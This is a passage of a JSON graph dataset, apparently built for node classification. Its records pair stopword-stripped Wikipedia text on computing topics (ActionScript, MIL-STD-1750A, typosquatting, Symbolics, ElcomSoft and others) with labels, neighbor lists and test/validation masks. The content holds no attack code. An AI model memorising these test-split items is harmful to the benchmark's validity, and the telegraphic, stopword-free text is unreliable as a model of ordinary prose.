data types as2 data types actionscript 3 primitive prime data types actionscript 3 complex data types basic syntax order make empty object informal way types automatically put place unlike object-oriented languages actionscript makes distinction primitive types reference types actionscript variables reference types however objects belong primitive data types includes boolean number int uint string immutable variable supposedly primitive type e.g integer passed function altering variable inside function alter original variable new int object created inside function variable another primitive datatype e.g xml passed function altering variable inside function alter original variable well new xml object created data types assigned values literals reference actionscript pointer instance class reference stores memory address object – operations references follow value reference memory address object carry operation object objects actionscript accessed references instead accessed directly references object may removed using delete keyword removal actual objects data done flash player garbage collector checks existing references flash memory space none found reference made orphaned object removed memory reason memory management actionscript requires careful application development planning intermediate language compiled code flash microsoft .net swf file saved locally decompiled source code assets decompilers capable nearly full reconstruction original source file actual code used creation although results vary case-by-case basis opposition decompilers actionscript obfuscators introduced transform code form breaks decompiler output preserving functionality structure program higher-quality obfuscators implement lexical transformations identifier renaming control flow transformation data abstraction transformation collectively make harder decompilers generate output likely useful human less robust obfuscators insert traps decompilers obfuscators either cause decompiler software crash unexpectedly generate unintelligible source code following example actionscript 3.0 code generated decompiler program obfuscation code obfuscation code obfuscation",
    "neighbors": [
      11291,
      9245,
      544,
      5677,
      9780,
      1591,
      10819,
      8775,
      4171,
      84,
      603,
      5219,
      9841,
      9345,
      5255,
      5768,
      6791,
      9871,
      8854,
      155,
      3761,
      7347,
      5311,
      7871,
      4292,
      3270,
      4822,
      7894,
      6875,
      7396,
      8421,
      4844,
      10991,
      2804,
      3830,
      259,
      1802,
      10507,
      11537,
      4378,
      7455,
      803,
      11060,
      2880,
      11087,
      3921,
      339,
      3413,
      9046,
      9560,
      11625,
      5483,
      9579,
      2943,
      1409,
      3462,
      4486,
      8071,
      9097,
      3469,
      11674,
      6555,
      8605,
      8609,
      10145,
      5031,
      8628,
      438,
      5048,
      9152,
      963,
      7627,
      10703,
      11219,
      5588,
      4056,
      479,
      9185,
      482,
      4069,
      11237,
      487,
      7147,
      8171,
      9195,
      2556,
      6143
    ],
    "mask": "None"
  },
  {
    "node_id": 10098,
    "label": 3,
    "text": "MIL-STD-1750A:mil-std-1750a mil-std-1750a 1750a formal definition 16-bit computer instruction set architecture isa including required optional components described military standard document mil-std-1750a 1980 since august 1996 inactive new designs addition core isa definition defines optional instructions fpu mmu importantly standard define implementation details 1750a processor 1750a supports 2 16-bit words memory core standard standard defines optional memory management unit allows 2 16-bit words memory using 512 page mapping registers i/o space defining separate instruction data spaces keyed memory access control instructions 16 bits although 16-bit extension standard computer 16 general purpose 16-bit registers 0 15 registers 1 15 used index registers registers 12 15 used base registers 16 registers could used stack pointer sjs urs instructions stack jump subroutine unstack return subroutine register 15 used stack pointer pshm popm instructions push multiple pop multiple computer instructions 16 32-bit binary arithmetic well 32 48 bit floating point i/o generally via i/o instructions xio vio separate 2 16-bit word address space may specialized bus mil-std-1750a define implementation details 1750a products available wide variety companies form component board system-level offerings implemented myriad technologies often advanced exotic respective periods e.g gaas ecl sos particular interest fact 1750a systems often offer high levels radiation hazardous environment protection making particularly suited military aviation space applications examples mil-std-1750a implementations include processors based mil-std-1750a usually programmed jovial high-level programming language defined united states department defense derived algol 58 lesser extent ada used also c compilers example cleanscape xtc-1750a older versions gnu gcc contain support mil-std-1750a declared obsolete version 3.1 removed subsequent versions addition ddc-i provides score integrated development environment ide ada95 c compilers tads tartan ada development system ada83 development environment targeting processors based mil-std-1750a u.s. air force defined standard order common computing architecture thereby reduce costs software computer systems military computing needs includes embedded tasks aircraft missile control systems well mundane general military computing needs advantages concept recognized outside usaf 1750a adopted numerous organizations european space agency nasa israeli aircraft industries many projects academia examples military aircraft using 1750a include fully space rated implementations make 1750a one types computers applicable use deep space applications example spacecraft use 1750a",
    "neighbors": [
      8352,
      4742,
      8262,
      10089,
      428,
      9804,
      9932,
      2353,
      1461,
      9911,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 10099,
    "label": 7,
    "text": "Cloud_Elements:cloud elements cloud elements cloud api integration platform enables developers publish integrate aggregate manage apis unified platform using cloud elements developers quickly connect entire categories cloud services e.g. crm documents finance using uniform apis simply synchronize data multiple cloud services e.g salesforce zendesk quickbooks using innovative integration toolkit founded october 2012 cloud elements purpose built developers help organize world apis one-to-many approach ‘ visionary ’ api management according gartner inc. cloud elements headquartered denver co serves customers worldwide information found www.cloud-elements.com cloud elements accelerates api integrations innovative api hub technology providing uniform apis developers use easily make apis work together past years developers published millions unique apis one island data bigger challenge integrate apis together order synchronize data build new apps faster october 2012 cloud elements founded ceo mark geene cto vineet joshi vp product development atul barve three shared vision help developers build cloud applications faster lower cost ... since start company cloud elements grown 100 employees work together bring api integrations business sizes july 18 2014 company announced receiving 3.1 million series funding round investors include virginia-based grotech ventures california-based icon venture partners along galvanize ventures january 9 2017 company announced receiving 13 million funding reach series b funding led harbert growth partners allow cloud elements continue revenue increase nearly 40 percent quarter-over-quarter sapphire 2018 sap launched sap cloud platform open connectors purpose built api integration platform leveraging cloud elements catalog feature-rich connectors 150 leading enterprise saas applications cloud elements created offer cloud applications hubs provide restful apis json payloads cloud elements differentiates one-to-many api lets developers integrate maintain several services elements category within hubs connector “ elements ” provide variety advanced features built cloud elements ’ api integration platform puts data center company application ecosystem provide virtual data hub puts data model center integration strategy making easier manage integrate data additionally cloud elements provides normalized consistent apis across entire catalog elements eliminate need experts every endpoint finally platform allows service embedded app customers convenience virtual data resources vdr provide canonicalized view data objects eliminating need point-to-point mapping data every new application putting data models center application ecosystem enables management company ’ data enriched api models maintained cloud elements make easier map defined resources required endpoints traditional integration platforms point-to-point meaning new application needs connected directly every application ecosystem point-to-point integration best solution external integration embedded platform makes difficult scale effectively use ce ’ vdr created ui easily maps domain model cloud services use allow directly write integrations also offer vdr templates pre-written templates common resources used customers pre-mapping multiple endpoints",
    "neighbors": [
      10236,
      7149
    ],
    "mask": "Test"
  },
  {
    "node_id": 10100,
    "label": 5,
    "text": "Digital_Signal_Designation:digital signal designation digital signal designation classification digital bit rates digital multiplex hierarchy used transport signals one location another telecommunications see sonet information",
    "neighbors": [
      8192,
      5505,
      2860,
      7799
    ],
    "mask": "Test"
  },
  {
    "node_id": 10101,
    "label": 6,
    "text": "List_of_file_copying_software:list file copying software article provides list inbuilt third party file copying moving software utilities software used part computer file management explicitly move copy files data demand one location another storage device file copying fundamental operation data storage popular operating systems linux windows macos well smartphone operating systems android contain built-in file copying functions well command line cli graphical gui interfaces filing system copy move functions cases replaced supplemented third party software different extended improved functionality article lists inbuilt well external software designed purpose software designed copy clone image author entire storage devices cds dvds blu-ray disks hard drives storage device partitions back data copiers work storage devices logical unit general file managers utilities related file copying software please see examples comparable operating functionality seen across file copying programs generic differentiators functions software gizmo freeware published basic comparison reviews range well-known third party file copying software windows july 2012 fastcopy given top place reviewers highest speed also light system resources author states uses cache avoid slowing software win32 api c runtime rather mfc ultracopier recognised well-developed gui interface unstoppable copier well regarded niche copier designed best results damaged media files cost speed teracopy also mentioned also worth considering third-party file transfer software include",
    "neighbors": [
      1412,
      2568,
      1801,
      6280,
      6797,
      2198,
      10654,
      9762,
      5158,
      7983,
      7088,
      1844,
      823,
      11256,
      1083,
      9025,
      1358,
      10195,
      1750,
      2406,
      5482,
      10476,
      9840,
      7672,
      10489,
      6270
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10102,
    "label": 5,
    "text": "Handle_System:handle system handle system corporation national research initiatives proprietary registry assigning persistent identifiers handles information resources resolving handles information necessary locate access otherwise make use resources handles used elsewhere computing handle system handles opaque encode information underlying resource bound metadata regarding resource consequently handles rendered invalid changes metadata system developed bob kahn corporation national research initiatives cnri original work funded defense advanced research projects agency darpa 1992 1996 part wider framework distributed digital object services thus contemporaneous early deployment world wide web similar goals handle system first implemented autumn 1994 administered operated cnri december 2015 new multi-primary administrator mpa mode operation introduced dona foundation administers system global handle registry accredits mpas including cnri international doi foundation system currently provides underlying infrastructure handle-based systems digital object identifiers dspace mainly used provide access scholarly professional government documents information resources cnri provides specifications source code reference implementations servers protocols used system royalty-free public license similar open source license thousands handle services currently running 1000 universities libraries also operation national laboratories research groups government agencies commercial enterprises receiving 200 million resolution requests per month handle system defined informational rfcs 3650 3651 3652 internet engineering task force ietf includes open set protocols namespace reference implementation protocols documentation software related information provided cnri dedicated website handles consist prefix identifies naming authority suffix gives local name resource similar domain names prefixes issued naming authorities one multi-primary administrators system upon payment fee must renewed annually naming authority may create number handles unique local names within assigned prefixes example handle first example handle handle.net software license codice_3 prefix assigned naming authority case handle.net codice_4 local name within namespace local name may consist characters unicode ucs-2 character set prefix also consists ucs-2 characters prefixes consist one naming authority segments separated periods representing hierarchy naming authorities thus example codice_5 naming authority prefix cnri codice_6 designates subordinate naming authority within 20 prefix examples top-level prefixes federated naming authorities dona foundation codice_7 doi handles codice_8 handles assigned itu codice_9 handles issued german gesellschaft für wissenschaftliche datenverarbeitung mbh göttingen gwdg scientific computing center university göttingen codice_10 coalition handle services – china older legacy prefixes issued cnri multi-primary administrator mpa structure instituted typically four five digits second example handle administered university leicester prefixes must registered global handle registry dona foundation approved registrar normally fee uses handles computing handle opaque encodes information underlying resource provides means retrieve metadata resource may contrasted uniform resource locator url may encode within identifier attributes resource protocol used access server holding resource server host name port number perhaps even location specifics name file server file system containing resource handle system specifics encoded handle found metadata handle bound metadata may include many attributes information resource locations forms available types access e.g free versus paid offered processing metadata determine resource accessed provision resource user performed separate step called resolution using resolver server may different ones involved exchanging handle metadata unlike urls may become invalid metadata embedded within becomes invalid handles become invalid need change locations metadata attributes change helps prevent link rot changes information resource location need reflected changes metadata rather changes every reference resource handle may administrator administration handles done distributed environment similar dns domain names name-to-value bindings may also secured via signatures verify data via challenge response verify transmission data allowing handles used trust management applications possible underlying information resource associated multiple handles two university libraries generate handles therefore possibly different sets metadata book handle system compatible domain name system dns require unlike persistent identifiers purls arks similar handles utilise domain names however unlike domain-name based approaches handles require separate prefix registration process handle servers separate domain name servers handles used natively expressed uniform resource identifiers uris namespace within info uri scheme example codice_1 may written uri codice_12 handle system namespaces digital object identifiers info uri namespaces right example codice_13 another way writing handle current revision doi handbook uri handle system namespaces define special presentation rules example digital object identifiers represent high percentage extant handles usually presented doi prefix codice_14 handles may also expressed uniform resource locators urls use http proxy server implementation handle system consists local handle services made one sites provide servers store specific handles global handle registry unique local handle service stores information prefixes also known naming authorities within handle system queried find specific handles stored local handle services within distributed system handle system website provides series implementation tools notably handle.net software handle.net client libraries handle clients embedded end user software e.g. web browser server software e.g. web server extensions already available adobe acrobat firefox handle client software libraries available c java applications developed specific add-on tools e.g. doi system interoperable network distributed handle resolver servers also known proxy server system linked global resolver one logical entity though physically decentralised mirrored users handle system technology obtain handle prefix created global handle registry global handle registry maintains resolves prefixes locally maintained handle services local handle service therefore resolve handle global resolver handles identifiers passed client query naming authority/prefix handle system global handle registry ghr ghr responds sending client location information relevant local handle service may consist multiple servers multiple sites query sent relevant server within local handle service local handle service returns information needed acquire resource e.g. url turned http re-direct note client already information appropriate lhs query initial query ghr omitted though original model handle system derives dealt management digital objects handle system mandate particular model relationships identified entities limited identifying digital objects non-digital entities may represented corresponding digital object purposes digital object management care needed definition objects relate non-digital entities established models aid definitions e.g. functional requirements bibliographic records frbr cidoc crm indecs content model applications found helpful marry framework handle application example advanced distributed learning adl initiative brings together handle system application existing standards distributed learning content using shareable content object reference model scorm digital object identifier doi system implementation handle system adopted together indecs framework deal semantic interoperability handle system also makes explicit importance organizational commitment persistent identifier scheme mandate one model ensuring commitment individual applications may choose establish sets rules social infrastructure ensure persistence e.g. used dspace application doi application handle system designed meet following requirements contribute persistence identifier string identifier resolution mechanism among objects currently identified handles journal articles technical reports books theses dissertations government documents metadata distributed learning content data sets handles used digital watermarking applications grid applications repositories although individual users may download use handle.net software independently many users found beneficial collaborate developing applications federation using common policy additional technology provide shared services one first persistent identifier schemes handle system widely adopted public private institutions proven several years see paradigm persistent identifiers handle system applications may use handles simple persistent identifiers commonly used resolve current url object may choose take advantage features support simultaneous return output multiple pieces current information related object defined data structures enables priorities established order multiple resolutions used handles therefore resolve different digital versions content mirror sites different business models pay vs. free secure vs. open public vs. private also resolve different digital versions differing content mix objects required distance-learning course thousands handle services running today located 71 countries 6 continents 1000 run universities libraries handle services run user federations national laboratories universities computing centers libraries national local government agencies contractors corporations research groups major publishers use handle system persistent identification commercially traded open access content implementation digital object identifier doi system number prefixes allow users assign handles growing stands 12,000 early 2014 six top-level global handle registry servers receive average 68 million resolution requests per month proxy servers known cnri passing requests system web receive average 200 million resolution requests per month statistics handle quick facts 2010 cnri itu international telecommunication union entered agreement collaborate use handle system digital object architecture generally working specific details collaboration april 2009 itu listed handle system emerging trend handle system handle.net global handle registry trademarks corporation national research initiatives cnri non-profit research development corporation usa handle system subject patents cnri licenses handle system technology public license similar open source license order enable broader use technology handle system infrastructure supported prefix registration service fees majority coming single prefix holders largest current single contributor international doi foundation public license allows commercial non-commercial use low cost patented technology reference implementation software allows software freely embedded systems products service agreement also available users intend provide identifier and/or resolution services using handle system technology handle system public license handle system represents several components long-term digital object architecture january 2010 cnri released general-purpose digital object repository software another major component architecture information release including protocol specification source code ready-to-use system clients utilities available",
    "neighbors": [
      10114,
      6406,
      6662,
      4232,
      5641,
      4107,
      8717,
      3858,
      6419,
      8085,
      1022,
      7702,
      9243,
      9376,
      6306,
      4392,
      5885,
      2680,
      7085,
      6320,
      6014,
      4916,
      7604,
      7350,
      9397,
      1083,
      1723,
      10049,
      4548,
      5956,
      2247,
      2887,
      1993,
      3146,
      9169,
      10452,
      5078,
      10584,
      1502,
      10083,
      1637,
      4581,
      10981,
      11623,
      2410,
      1515,
      3054,
      2415,
      2418,
      7156,
      119,
      2936,
      5373,
      894
    ],
    "mask": "None"
  },
  {
    "node_id": 10103,
    "label": 8,
    "text": "Typosquatting:typosquatting typosquatting also called url hijacking sting site fake url form cybersquatting possibly brandjacking relies mistakes typos made internet users inputting website address web browser user accidentally enter incorrect website address may led url including alternative website owned cybersquatter typosquatter url usually one five kinds similar victim site address e.g example.com similar abuses typosquatter site user may also tricked thinking fact real site use copied similar logos website layouts content spam emails sometimes make use typosquatting urls trick users visiting malicious sites look like given bank site instance several different reasons typosquatters buying typo domain many companies including verizon lufthansa lego garnered reputations aggressively chasing typosquatted names lego example spent roughly us 500,000 taking 309 cases udrp proceedings celebrities also frequently pursued domain names singers star athletes prominent examples include basketball player dirk nowitzki udrp dirkswish.com actress eva longoria udrp evalongoria.org since 2006 typosquatted variant google called 'goggle.com existed considered phishing/fraud site later ca 2011–2012 url redirected google.com 2018 check revealed redirect users adware pages another example corporate typosquatting yuube.com targeting youtube users programmed redirect malicious website page asks users add security check extension really malware similarly www.airfrance.com typosquatted www.arifrance.com diverting users website peddling discount travel examples equifacks.com equifax.com experianne.com experian.com tramsonion.com transunion.com three typosquatted sites registered comedian john oliver show last week tonight users trying visit popular internet-based game agar.io may misspell said url agor.io visiting site known produce jumpscare screamer popular creepypasta jeff killer flashed rapidly produced loud noise original site taken 2017 linked randomly-themed phishing websites united states 1999 anticybersquatting consumer protection act acpa contains clause section 3 amending 15 usc 1117 include sub-section 2 b ii aimed combatting typosquatting however april 17 2006 evangelist jerry falwell failed get u.s. supreme court review decision allowing christopher lamparello use www.fallwell.com relying plausible misspelling falwell name lamparello gripe site presents misdirected visitors scriptural references intended counter fundamentalist preacher scathing rebukes homosexuality lamparello v. falwell high court let stand 2005 fourth circuit finding use mark domain name gripe site criticizing markholder constitute cybersquatting uniform domain-name dispute-resolution policy udrp trademark holders file case world intellectual property organization wipo typosquatters cybersquatters general complainant show registered domain name identical confusingly similar trademark registrant legitimate interest domain name domain name used bad faith",
    "neighbors": [
      8064,
      2945,
      3814,
      2887,
      7370,
      877,
      1139,
      5012,
      7515
    ],
    "mask": "Test"
  },
  {
    "node_id": 10104,
    "label": 9,
    "text": "Symbolics:symbolics symbolics refers two companies now-defunct computer manufacturer symbolics inc. privately held company acquired assets former company continues sell maintain open genera lisp system macsyma computer algebra system symbolics.com domain originally registered march 15 1985 making first .com-domain world august 2009 sold napkin.com formerly xf.com investments symbolics inc. computer manufacturer headquartered cambridge massachusetts later concord massachusetts manufacturing facilities chatsworth california suburban section los angeles first ceo chairman founder russell noftsker symbolics designed manufactured line lisp machines single-user computers optimized run lisp programming language symbolics also made significant advances software technology offered one premier software development environments 1980s 1990s sold commercially open genera tru64 unix hp alpha lisp machine first commercially available workstation although word yet coined symbolics spinoff mit ai lab one two companies founded ai lab staffers associated hackers purpose manufacturing lisp machines lisp machines inc. although symbolics attracted hackers funding symbolics initial product lm-2 introduced 1981 repackaged version mit cadr lisp machine design operating system software development environment 500,000 lines written lisp microcode based mit lisp machine lisp software bundle later renamed zetalisp distinguish symbolics product vendors also licensed mit software symbolics zmacs text editor variant emacs implemented text-processing package named zwei acronym zwei eine initially eine acronym eine emacs recursive acronyms puns german words one eins eine two zwei lisp machine system software copyrighted mit licensed symbolics lmi 1981 symbolics shared copyrighted enhancements source code mit kept mit server according richard stallman symbolics engaged business tactic forced mit make symbolics copyrighted fixes improvements lisp machine os available symbolics mit symbolics competitors thereby choke competitor lmi time insufficient resources independently maintain develop os environment symbolics felt longer sufficient control product point symbolics began using copy software located company servers—while stallman says symbolics prevent lisp improvements flowing lisp machines inc. base symbolics made extensive improvements every part software continued deliver almost source code customers including mit however policy prohibited mit staff distributing symbolics version software others end open collaboration came end mit hacker community reaction stallman initiated gnu project make new community eventually copyleft gnu general public license would ensure hacker software could remain free software way symbolics played key albeit adversarial role instigating free software movement 1983 year later planned symbolics introduced 3600 family lisp machines code-named l-machine internally 3600 family innovative new design inspired cadr architecture sharing implementation details main processor 36-bit word divided 4 8 bits tags 32 bits data 28 bits memory address memory words 44 bits additional 8 bits used error-correcting code ecc instruction set stack machine 3600 architecture provided 4,096 hardware registers half used cache top control stack rest used microcode time-critical routines operating system lisp run-time environment hardware support provided virtual memory common machines class garbage collection unique original 3600 processor microprogrammed design like cadr built several large circuit boards standard ttl integrated circuits features common commercial computers class time cpu clock speed varied depending particular instruction executed typically around 5 mhz many lisp primitives could executed single clock cycle disk i/o handled multitasking microcode level 68000 processor known front-end processor fep started main computer handled slower peripherals normal operation ethernet interface standard equipment replacing chaosnet interface lm-2 3600 roughly size household refrigerator partly due size processor – cards widely spaced allow wire-wrap prototype cards fit without interference—and partly due limitations disk drive technology early 1980s 3600 introduction smallest disk could support zetalisp software 14 inches 356 mm across 3600s shipped 10½-inch fujitsu eagle 3670 3675 slightly shorter height essentially machine packed little tighter advent later disk drives could hold hundreds megabytes led introduction 3640 3645 roughly size two-drawer file cabinet later versions 3600 architecture implemented custom integrated circuits reducing five cards original processor design two large manufacturing cost savings performance slightly better old design 3650 first g machines known within company housed cabinet derived 3640s denser memory smaller disk drives enabled introduction 3620 size modern full-size tower pc 3630 fat 3620 room memory video interface cards 3610 lower priced variant 3620 essentially identical every way except licensed application deployment rather general development various models 3600 family popular ai research commercial applications throughout 1980s ai commercialization boom 1980s led directly symbolics success decade symbolics computers widely believed best platform available developing ai software lm-2 used symbolics-branded version complex space-cadet keyboard later models used simplified version right known simply symbolics keyboard featured many modifier keys used zmacs notably control/meta/super/hyper block feature complex symbol set space-cadet keyboard also contributing 3600 series success line bit-mapped graphics color video interfaces combined extremely powerful animation software symbolics graphics division headquartered westwood california stone throw major hollywood movie television studios made s-render s-paint software industry leaders animation business symbolics developed first workstations capable processing hdtv quality video enjoyed popular following japan 3600 – standard black-and-white monitor – made cameo appearance movie real genius company also referenced michael crichton novel jurassic park symbolics graphics division sold nichimen trading company early 1990s s-graphics software suite s-paint s-geometry s-dynamics s-render ported franz allegro common lisp sgi pc computers running windows nt today sold mirai izware llc continues used major motion pictures famously new line cinema lord rings video games military simulations symbolic 3600-series computers also used first front end controller computers connection machine massively parallel computers manufactured thinking machines inc. another mit spinoff based cambridge massachusetts connection machine ran parallel variant lisp initially used primarily ai community symbolics lisp machine particularly good fit front-end machine long time operating system n't name finally named genera around 1984 system included number advanced dialects lisp heritage maclisp pdp-10 included data types multiple-inheritance object-oriented programming features lisp dialect called lisp machine lisp mit symbolics used name zetalisp symbolics later wrote new software symbolics common lisp version common lisp standard late 1980s 2 years later planned ivory family single-chip lisp machine processors superseded g-machine 3650 3620 3630 systems ivory 390k transistor vlsi implementation designed symbolics common lisp using ns custom symbolics hardware design language hdl addressed 40-bit word 8 bits tag 32 bits data/address since addressed full words bytes half-words allowed addressing 4 gigawords gw 16 gigabytes gb memory increase address space reflected growth programs data semiconductor memory disk space became cheaper ivory processor 8 bits ecc attached word word fetched external memory chip actually 48 bits wide ivory instruction 18 bits wide two instructions plus 2-bit cdr code 2-bit data type instruction word fetched memory fetching two instruction words time memory enhanced ivory performance unlike 3600 microprogrammed architecture ivory instruction set still microcoded stored 1200 × 180-bit rom inside ivory chip initial ivory processors fabricated vlsi technology inc san jose california 2 µm cmos process later generations fabricated hewlett packard corvallis oregon 1.25 µm 1 µm cmos processes ivory stack architecture operated 4-stage pipeline fetch decode execute write back ivory processors marketed stand-alone lisp machines xl400 xl1200 xl1201 headless lisp machines nxp1000 add-in cards sun microsystems ux400 ux1200 apple macintosh macivory ii iii computers lisp machines ivory processors operated speeds two six times faster 3600 depending model revision ivory chip ivory instruction set later emulated software microprocessors implementing 64-bit alpha architecture virtual lisp machine emulator combined operating system software development environment xl machines sold open genera sunstone risc-like processor released shortly ivory designed ron lebel group symbolics westwood office however project canceled day supposed tape quickly commercial ai boom mid-1980s propelled symbolics success ai winter late 1980s early 1990s combined slowdown reagan star wars missile defense program darpa invested heavily ai solutions severely damaged symbolics internal war noftsker ceo board hired 1986 brian sear whether follow sun suggested lead focus selling software re-emphasize superior hardware ensuing lack focus noftsker sear fired company caused sales plummet fact combined ill-advised real estate deals company management boom years entered large long-term lease obligations california drove symbolics bankruptcy rapid evolution mass-market microprocessor technology pc revolution advances lisp compiler technology economics manufacturing custom microprocessors severely diminished commercial advantages purpose-built lisp machines 1995 lisp machine era ended symbolics hopes success symbolics continued enterprise limited revenues supported mainly service contracts remaining macivory ux-1200 ux-1201 machines still used commercial customers symbolics also sold virtual lisp machine vlm software dec compaq hp alpha-based workstations alphastation servers alphaserver refurbished macivory iis symbolics keyboards july 2005 symbolics closed chatsworth california maintenance facility reclusive owner company andrew topping died year current legal status symbolics software uncertain assortment symbolics hardware still available purchase august 2007 us dod still paying symbolics regular maintenance work march 15 1985 symbolics.com became first currently since still registered oldest registered .com domain internet symbolics.com domain purchased xf.com 2009 genera also featured extensive networking interoperability software seen point local area network system called chaosnet invented lisp machine predating commercial availability ethernet symbolics system supported chaosnet also one first tcp/ip implementations also supported decnet ibm sna network protocols dialnet protocol used phone lines modems genera would using hints distributed namespace database somewhat similar dns comprehensive like parts xerox grapevine automatically select best protocol combination use connecting network service application program user command would specify name host desired service example host name request terminal connection might yield connection tcp/ip using telnet protocol although many possibilities likewise requesting file operation copy file command might pick nfs ftp nfile symbolics network file access protocol one several others might execute request tcp/ip chaosnet whatever network suitable popular application program symbolics lisp machine icad computer-aided engineering system one first networked multi-player video games version spacewar developed symbolics lisp machine 1983 electronic cad software symbolics lisp machine used develop first implementation hewlett-packard precision architecture symbolics research development staff first mit later company produced number major innovations software technology symbolics graphics division sgd founded 1982 sold nichimen graphics 1992 developed s-graphics software suite s-paint s-geometry s-dynamics s-render symbolics genera software also used create computer animated movies used popular movies",
    "neighbors": [
      10752,
      4097,
      7173,
      11269,
      2056,
      8204,
      2062,
      9231,
      9742,
      9749,
      8728,
      4633,
      8226,
      6187,
      2105,
      6717,
      8771,
      3142,
      1613,
      80,
      9299,
      3675,
      1121,
      7267,
      8293,
      2666,
      5751,
      7805,
      2179,
      9864,
      9877,
      5803,
      2225,
      7867,
      4799,
      2243,
      7364,
      7880,
      8908,
      205,
      10463,
      7392,
      7904,
      11488,
      11495,
      1776,
      5360,
      242,
      5361,
      8435,
      8944,
      6906,
      2304,
      3334,
      6919,
      5384,
      1801,
      2832,
      8976,
      11539,
      1301,
      10012,
      3869,
      2335,
      8993,
      2345,
      7983,
      10547,
      311,
      3389,
      10051,
      2887,
      2901,
      6493,
      10083,
      6502,
      11112,
      4981,
      3446,
      4477,
      4992,
      7562,
      5519,
      5531,
      6556,
      6047,
      4516,
      5029,
      5031,
      9128,
      5040,
      5569,
      4546,
      6594,
      9665,
      4550,
      11218,
      9686,
      10712,
      3034,
      989,
      5598,
      3051,
      10734,
      11255,
      504,
      9723
    ],
    "mask": "None"
  },
  {
    "node_id": 10105,
    "label": 2,
    "text": "Spamd:spamd spamd isc-licensed lightweight spam-deferral daemon written umbrella openbsd project spamd works directly smtp connections supports features greylisting minimising false positives compared system full-body analysis spamd designed work conjunction pf 4 fully functional posix system pf available i.e openbsd netbsd freebsd dragonfly bsd spamd useful preventing inbound spam reaching mail servers also used partial application level proxy ensure external mail servers connecting internal mail servers behave legitimately additionally spamd useful preventing outgoing spam systems may compromised control spammers used block spammers use following features",
    "neighbors": [
      9223,
      10631,
      2825,
      3465,
      1932,
      274,
      7702,
      10906,
      5407,
      6702,
      9520,
      2245,
      1993,
      8778,
      3404,
      11086,
      5970,
      5084,
      9824,
      7139,
      1637,
      4071,
      6762,
      5230,
      5492,
      4725,
      1785,
      8954
    ],
    "mask": "None"
  },
  {
    "node_id": 10106,
    "label": 4,
    "text": "Payment_Card_Industry_Security_Standards_Council:payment card industry security standards council payment card industry security standards council originally formed american express discover financial services jcb international mastercard visa inc. 7 september 2006 goal managing ongoing evolution payment card industry data security standard council claims independent various card vendors make council pci council formed body security standards known payment card industry data security standard pci dss standards consist twelve significant requirements including multiple sub-requirements contain numerous directives businesses may measure payment card security policies procedures guidelines also manage payment application data security standard pa-dss formerly referred payment application best practices pabp recently collaborated emvco provide security requirements testing procedures assessor training support emv 3-d secure v2.0 standard members pci security standards council currently consist five major payment brands visa mastercard american express discover jcb executives management pci ssc also filled employees aforementioned payment brands interested parties participate development pci security standards registration participating organization participants organized special interest groups tasked recommending revisions development various security standards maintained council",
    "neighbors": [
      3552,
      6080,
      419,
      9640,
      4471
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10107,
    "label": 4,
    "text": "ElcomSoft:elcomsoft elcomsoft co.ltd privately owned software company headquartered moscow russia since establishment 1990 company working computer security programs main focus password system recovery software july 16 2001 dmitry sklyarov russian citizen employed elcomsoft time visiting united states def con arrested jailed allegedly violating united states dmca law writing elcomsoft advanced ebook processor software landmark court case ensued setting precedents attracting much public attention protest december 17 2002 elcomsoft found guilty four charges dmca bruce chizen ceo adobe systems say cnet looking back 20/20 wish could better communication elcomsoft dmitry sklyarov eff electronic frontier foundation whole thing went public 'm sorry n't able think could resolved lot issues thunder tables® company technology developed ensure guaranteed recovery microsoft word microsoft excel documents protected 40-bit encryption technology first appeared 2007 employs time–memory tradeoff method build pre-computed hash tables open corresponding files matter seconds instead days tables take around 4gb far technology used two password recovery programs advanced office password breaker advanced pdf password recovery 7,599,492 fast cryptographic key recovery system method 7,783,046 probabilistic cryptographic key identification deterministic result 7,787,629 use graphics processors parallel math co-processors password recovery 7,809,130 password recovery system method 7,929,707 use graphics processors parallel math co-processors password recovery 2009 elcomsoft released tool takes wpa/wpa2 hash codes uses brute-force methods guess password associated wireless network brute force attack carried testing passwords known ssid network wpa/wpa2 hash code captured passwords tested generated dictionary using various mutation genetic algorithm methods including case mutation password password password etc year mutation password password1992 password67 etc many mutations try guess correct password advantages using methods traditional ones rainbow tables numerous rainbow tables large size amount ssid/password combinations saved take long time traverse large numbers passwords per ssid reliant ssid common one rainbow table already listed hash codes common ones include linksys belkin54g etc. ewsa however uses relatively small dictionary file megabytes versus dozens gigabytes common rainbow tables creates passwords fly needed rainbow tables tested captured wpa/wpa2 hash code via computer processor relatively low numbers simultaneous processes possible ewsa however use computer processor 32 logical cores 8 gpus many cuda cores nvidia stream processors ati november 30 2010 elcomsoft announced encryption system used canon cameras ensure pictures exif metadata altered flawed fixed day dmitry sklyarov gave presentation confidence 2.0 conference prague demonstrating flaws among others showed image astronaut planting flag soviet union moon images pass canon authenticity verification",
    "neighbors": [
      7556,
      5284,
      6916,
      3984,
      1623,
      8637
    ],
    "mask": "None"
  },
  {
    "node_id": 10108,
    "label": 1,
    "text": "SESAM_(database):sesam database sesam sql server relational database system originally developed siemens whose role developer successively succeeded siemens nixdorf informationssysteme sni fujitsu siemens computers fujitsu technology solutions runs bs2000/osd mainframe clients running bs2000/osd unix systems solaris linux microsoft windows supported",
    "neighbors": [
      9920,
      36,
      9766,
      3431,
      1707,
      9137,
      3443,
      5492,
      10837,
      823,
      9177,
      1503
    ],
    "mask": "None"
  },
  {
    "node_id": 10109,
    "label": 2,
    "text": "NSLU2:nslu2 nslu2 network storage link usb 2.0 disk drives network-attached storage nas device made linksys introduced 2004 discontinued 2008 makes usb flash memory hard disks accessible network using smb protocol also known windows file sharing cifs superseded mainly nas200 enclosure type storage link another sense wrt600n wrt300n/350n combine wi-fi router storage link device runs modified version linux default formats hard disks ext3 filesystem firmware upgrade linksys adds ability use ntfs fat32 formatted drives device better windows compatibility device web interface various advanced features configured including user group permissions networking options device two usb 2.0 ports connecting hard disks uses arm-compatible intel xscale ixp420 cpu models manufactured prior around april 2006 linksys underclocked processor 133 mhz though simple hardware modification remove restriction possible later models circa may 2006 clocked rated speed 266 mhz device includes 32 mb sdram 8 mb flash memory also 100 mbit/s ethernet network connection nslu2 fanless making completely silent stock device runs customised version linux linksys required release source code per terms gnu general public license due availability source code nslu2 use well-documented commodity components relatively low price several community projects centered around including hardware modifications alternative firmware images alternative operating systems varying degrees reconfiguration unofficial hardware modifications include two main replacement firmware images available device first unslung based official linksys firmware improvements features added optware packages available expand functionality slugos/be formerly openslug based openembedded framework slugos/be allows users re-flash device minimal linux system including ssh server allow remote 